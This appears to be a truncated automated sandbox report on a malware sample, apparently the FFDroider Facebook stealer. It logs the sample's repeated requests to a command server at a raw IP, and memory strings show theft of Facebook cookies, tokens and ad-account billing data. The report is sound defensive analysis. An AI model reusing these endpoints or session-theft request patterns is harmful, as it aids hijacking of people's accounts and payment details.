Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153
Source: global traffic	HTTP traffic detected: GET /seemorebty/il.php?e=38b2c7a1af454d382927f81543d86055886bc02863457 HTTP/1.1Connection: Keep-AliveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Accept-Language: en-US,en;q=0.9User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36Host: 103.136.42.153

Source: unknown	Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 49718 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: fq/uX1fI+8wnFpghTp1o27/tvPsvMl9SuTt7mhWvMLOKpiDQdR5EpUpNHCTKu8edASCBCBCVLCubpJZvl329LQ==Date: Fri, 07 Oct 2022 13:58:24 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: 5cdiMoJOQEQILcX45Qf8wnYh81wrLU1KNhjDV4sDWI1s0fWbKsQS7+0gxV59QFub2kUq9j4BJMTTES1NQwPgoQ==Date: Fri, 07 Oct 2022 13:58:40 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: nY3CGGaNRMmocoszbn06QMB7yvVCrwf6I4Zv0iqjbqhykcyUpUYIxNQeFXGT3zs1RiqXoN+xK6Hx1EZ9udpbbA==Date: Fri, 07 Oct 2022 13:58:46 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: Mw7on8NFFWQR+rhcf+jwFGkmMZwHzGdxWCD76eqXdPgBQEl3jljuOL+ztiLVSBAo1eRA3ug5BkC60cvNiEhWDQ==Date: Fri, 07 Oct 2022 13:59:00 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: zmLcqRC9QViIit+ln0ZiOFQoBslTWw0G+d+ysNt7UUiIkVTmBKMHcVZyHiGGXV+EitPogRi+5yxsAZzzRY8Qew==Date: Fri, 07 Oct 2022 13:59:18 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: IqKxJ0nq+U38w433C8SugNr1iODFI5HU5N456LFHBtxB6R1pyojMg+6RvDS6oONnda+yVC0sYtnDLvy9sD3aew==Date: Fri, 07 Oct 2022 13:59:25 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: 31pUE67nBV4C9nwmqp/3sI1pvW50kQJjBIGAu6J3pG92wchuI0dln+nx2AlUF0dYMVy+mOsvwaHEna7Ny5tJ7Q==Date: Fri, 07 Oct 2022 13:59:28 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: mobkIDXzDXWuCoYj+MGZqVN+/2wIuixCcE4a7dujHooWVQwu2M/eqs34tZd8TUDV9IgEV0WiPgrzwupj9camrg==Date: Fri, 07 Oct 2022 13:59:47 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: 9skqJ1JFSpjkJ/zsqE8GOPq+sptKl4fXoq63U/BCKPasZ+Rpm+FBVuq1Aq/8JNO5OvOVpl+EoqwCQZ3r+bRweg==Date: Fri, 07 Oct 2022 13:59:49 GMTTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundVary: Accept-Encodingreport-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}x-fb-rlafr: 0document-policy: force-load-at-topcross-origin-resource-policy: same-origincross-origin-opener-policy: same-origin-allow-popupsPragma: no-cacheCache-Control: private, no-cache, no-store, must-revalidateExpires: Sat, 01 Jan 2000 00:00:00 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 0X-Frame-Options: DENYStrict-Transport-Security: max-age=15552000; preloadContent-Type: text/html; charset="utf-8"X-FB-Debug: SPy7pi4V1GReK60/XyYXQAY/EYU2d9HatMiDOcUWAlBu9i9ErTn3gS48Vf6gXwIxhO5ez+dOFHsqZLYPSdaNOQ==Date: Fri, 07 Oct 2022 14:00:15 GMTPriority: u=3,iTransfer-Encoding: chunkedAlt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Connection: close

Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153
Source: unknown	TCP traffic detected without corresponding DNS query: 103.136.42.153

Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.515757312.0000000003E90000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: #star-mini.c10r.facebook.comwww.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.335812596.0000000002F90000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: @,"Os":"","machineId":"http/:/en-US,en;q=0.9https://http://gzip, deflate.,%c[{"Cookie":"/settingscompat_iframe_token":"quickTokensetting %s not found.&ctarget=https%3A%2F%2Fwww.facebook.comcquick=jsc_c_e&cquick_token=/settings?find email</strong><strong>fbSettingsListItemContentEmail not found.0" title="href="https://www.facebook.com/profile_icondata-gt" role="<a aria-label=<a class=/profile.php?sk=friend_gs6">,"Compcode":","Friends":"no</span><span>no/*adtrust_dsl":disable_reason":account_currency_ratio_to_usd":~~--no\,"ed":","bl":","status":"c_user=%3Bc_user%3Dhttps://www.facebook.com/ads/manager/account_settings/account_billing",adAccountID":"DTSGInitialData",[],{"token":"LSD",[],{"token":"av=%s&__user=%s&__a=1&__csr=&__req=3&__beoa=0&__pc=PHASED:ads_campaign_manager_pkg&__hs=18770.PHASED:ads_campaign_manager_pkg.2.0.0.0&__bhv=2&dpr=1&__comet_req=0&fb_dtsg=%s&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":"%s"}&server_timestamps=true&doc_id=3972780502837874billing_threshold_currency_amount":{"formatted_amount":","qy":"https://www.facebook.com/bookmarks/pages?ref_type=logout_gearcounttype:https://www.facebook.com/pages/?category=your_pages&ref=bookmarksadmined_pages":{"nodes":[{,"Page":"1<a href="https://business.facebook.com,"bm":"<>class="lastRow right","currency":","a":","b":"CHROMEchrome.exeIEmsedge.exe,"Channel":","Browser":"00,"by1":"}]0102030405060708Failed to initialise Winsock, Error:%u equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: )bhttps://www.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292504672.0000000000A59000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292441887.0000000000A59000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: )https://www.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408766476.0000000000AB0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: )https://www.facebook.com/%3Cbr%20/%3E%0A%3Cb%3EDeprecated%3C/b%3E:%20%20mysql_pconnect():%20The%20mysql%20extension%20is%20deprecated%20and%20will%20be%20removed%20in%20the%20future:%20use%20mysqli%20or%20PDO%20instead%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_pconnect():%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E47%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cbr%20/%3E%0A%3Cb%3EWarning%3C/b%3E:%20%20mysql_query()%20expects%20parameter%202%20to%20be%20resource,%20boolean%20given%20in%20%3Cb%3E/www/wwwroot/103.136.42.153/seemorebty/includes/database.php%3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%20from%20t_channels%20where%20name='38b2c7a1af454d382927f81543d86055886bc02863457'%20limit%200,1%3Cbr%3E%0A%3Cbr%3E%0A%3Csmall%3E%0A%3Cfont%20color=%22%23ff0000%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E-,t equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559498712.0000000000A37000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.531012943.0000000003E50000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.581277907.0000000003E4F000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000003.530758241.0000000003E50000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: +www.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.559956447.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: +www.facebook.com:,u equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.414234687.00000000033E4000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.466216489.00000000033EC000.00000004.00000800.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.465481318.00000000033E0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: +www.facebook.comF equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.488315098.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545570144.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000002.561660230.0000000000A88000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: .www.facebook.com equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000005.00000002.569854907.0000000000F00000.00000004.00000001.01000000.00000003.sdmp	String found in binary or memory: @Ohttps://www.facebook.comSoftware\zsmjrry\zsmjrrySoftware\zsmjrry\zsmjrry1Software\zsmjrryhttp://103.136.42.153/seemorebty/z9Yzbx5JbVSUWmTGhttps://www.facebook.comwww.facebook.comtext/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36https://graph.facebook.com/&_index=5&_reqName=adaccount&_reqSrc=AdsPaymentMethodsDataLoader&_sessionID=&method=get&pretty=0&suppress_http_code=1/ads/manager/account_settings/account_billing/?act=&pid=p1&page=account_settings&tab=account_billing_settings/profile.php?sk=friends/ads/manager/accounts?_fb_noscript=1all_accounts_table_account_id_cellhref="/pages/?category=your_pages&ref=bookmarks/bookmarks/pages?ref_type=logout_geartab_count:/profile.php?id=adsApiVersion:"locale:"sessionId:"access_token:"?act=FDroid1Software\ffdroider equals www.facebook.com (Facebook)
Source: 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.405305583.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.551121249.0000000000A88000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.408530805.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.545939808.0000000000A87000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.292609395.0000000000A9B000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.475008071.0000000000A5E000.00000004.00000020.00020000.00000000.sdmp, 38b2c7a1af454d382927f81543d86055886bc02863457.exe, 00000003.00000003.409020260.0000000000A85000.00000004.00000020.00020000.00000000.sdmp, 